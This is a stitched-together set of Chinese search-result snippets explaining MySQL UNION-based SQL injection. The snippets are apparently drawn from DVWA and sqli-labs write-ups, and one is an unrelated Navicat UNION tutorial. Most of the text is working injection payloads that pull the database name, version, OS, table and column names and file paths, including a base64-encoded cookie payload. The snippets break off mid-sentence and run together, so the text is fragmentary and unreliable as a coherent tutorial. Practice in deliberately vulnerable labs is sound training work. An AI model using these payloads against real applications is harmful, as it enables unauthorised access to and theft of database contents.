id=1%27%20union%20select%20database(),version()--+&Submit=Submit# 服务器的操作系统版本@@version_compile_os' union select @@version_compile_os,version()--+ 查看所有的表名 ' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()+--+ mysql> ...
sss-s347glt.gxalabs.com' union select 1,2,3 --+ 编辑 5.查询使用的是那个数据库 sss-s347glt.gxalabs.com' union select 1,database(),3 --+ 编辑 6.查询表名 sss-s347glt.gxalabs.com' union select 1,database(),group_concat(table_name) from information_schema.tables where ...
可以通过设置参数ID值,让服务端返回union select的结果,例如,把ID的值设置为-1,这样数据库中没有id=-1的数据,所以会返回union select的结果,如图 返回的结果为2 : 3,意味着在union select 1, 2, 3中,2和3的位置可以输入MySQL语句。我们尝试在2的位置查询当前数据库名(使用database ()函数)访问id=1 union...
id=-1'unionselect1,group_concat(table_name),3frominformation_schema.tableswheretable_schema=database()--+ 5、爆数据列(字段) 现在,已知库名和表名,开始查询字段名,这里以users表名为例,构造payload如下。 1 ?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where...
http://192.168.77.128/dvwa/vulnerabilities/sqli/?id=-1'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- &Submit=Submit# limit 0,1:第一个表名,guestbook limit 1,1:第二个表名,users ...
navicat中UNION操作符于连接两个以上的 SELECT 语句的结果组合到一个结果集合中。多个 SELECT 语句会删除重复的数据,就好象两个查询结果捏到一起一样 工具/原料 navicat for mysql 版本10.0.11 数据库:mysql数据库 方法/步骤 1 新建一个数据database_union 2 在数据库中创建两个表table_union1,table_union2...
1' union select 1,2 # 1’ 部分表示与原始SQL的单引号拼接成完整字符 union 部分表示与原始SQL语句拼接 select 1,2 部分是SQL注入攻击者可以控制写的SQL,其中一定要保持只有2列 # 部分注释掉原始SQL的后半部分执行成功后,我们可以在select 1,2部分进行变形,如select user(),database()。即在输入点输入1’...
union select1,2,database(),version(),user(),6,7 b.得到数据库库名后查当前数据库表名 代码语言:javascript 复制 union select table_name from information_schema.tables where table_schema=database(); c.在查到的表名中查找列名,假设需要的表名为:user ...
这是因为将admin进行base64转码 YWRtaW4= 解码之后为admin 和第20关相似,只不过这一次将admin进行base64转码 使用burp抓包 在admin后面加上’并进行编码 发送后报错,显示还需要一个) 显示当前数据库 编码前:’) union select 1,2,database() # 编码后:JykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpICM= ...
() 分别用来查看当前数据库连接的用户名,数据库名称 以及mysql的版本比如返回 3 6 7 那么你把3 6 7 替换成user() database() version() 也就是 union select 1, 2 ,user() ,4 ,5 ,loadfile(), version() ,9 ,10, 11 这样就可以在页面上爆出 用户名 绝对路径之类的 函数名得你自己换和靠前面...